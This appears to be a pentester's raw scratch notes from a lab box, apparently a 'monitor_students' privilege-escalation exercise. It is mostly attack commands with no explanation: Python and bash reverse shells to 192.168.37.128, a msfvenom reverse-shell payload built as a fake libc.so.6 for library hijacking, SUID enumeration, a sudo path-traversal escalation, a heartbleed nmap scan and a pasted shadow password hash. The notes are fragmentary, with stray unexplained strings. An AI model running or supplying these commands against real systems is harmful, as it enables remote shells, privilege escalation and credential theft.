find / -type d -name "html" 2>/dev/null

$6$.TZ/W91itqby1Jp$6DfvDFI20yMvDipU2/vJR16F9z1LWYtvjKm9HBFzfpxKfqSWuQVFCawfAurLpbJkXzidNhgoXFRgED2FYRyJk/:18728:0:99999:7:::
cat 

737573H
70696369H


python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.37.128",4242));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'


bash -i >& /dev/tcp/192.168.37.128/4545 0>&1

-rwsr-sr-- 1 root   teacher  17K Apr 11 16:11 /lab/monitor_students (Unknown SGID binary)
  --- It looks like /lab/monitor_students is executing sleep and you can impersonate it (strings line: sleep)
  --- It looks like /lab/monitor_students is executing touch and you can impersonate it (strings line: touch /tH)
  --- Trying to execute /lab/monitor_students with strace in order to look for hijackable libraries...

home/lab_teacher/.bashrc
/home/lab_teacher/.profile
/home/lab_teacher/.lesshst
/home/lab_teacher/.python_history
/home/lab_teacher/.bash_logout
/home/lab_teacher/.bash_history
/home/lab_teacher/.viminfo

/swap.img
/var/log/auth.log
sudo -u lab_teacher /lab/monitor_students ../../bin/bash

find / -name db_password
find / -type f -user lab_teacher
find / -perm -4000 2>/dev/null

find / -type f -a \{ -perm -u+s -o -perm -g+s \} -exec ls -l {} \; 2> /dev/null
strace ./monitor_students 2>&1 | grep -i -E "open|access|no such file"


strace ./monitor_students 2>&1 > grep -iE "open|access|no such file"


msfvenom -a x64 -p linux/x64/shell_reverse_tcp LHOST=192.168.37.130 LPORT=5555 -f elf-so -o libc.so.6

We can connect to the local MYSQL service as 'root' and without a password!


nmap -sC -sV --version-intensity 5 -p 21,22,80    –script=ssl-heartbleed.nse   --script=http-enum 192.168.37.130



python3 -c "import pty;pty.spawn('/bin/bash')"

thsiascrtmssge

bash -i >& /dev/tcp/192.168.37.128/4242 0>&1

/dev/disk/by-uuid/bf332985-f62e-490f-aab1-66150ca298e3 /boot ext4 defaults 0 0
/dev/disk/by-uuid/EC6E-11D1 /boot/efi vfat defaults 0 0
/usr/bin/gpg
${uh%%:*}

shell running on 1234


find / -user www-data 2>/dev/null | grep -v "proc"
